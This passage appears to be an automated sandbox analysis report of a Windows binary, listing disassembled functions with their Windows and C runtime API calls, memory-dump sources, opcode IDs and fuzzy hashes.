                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1187119602-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00421E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1597257046-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                                                                                                                                                                                                                                                                                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 237123855-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
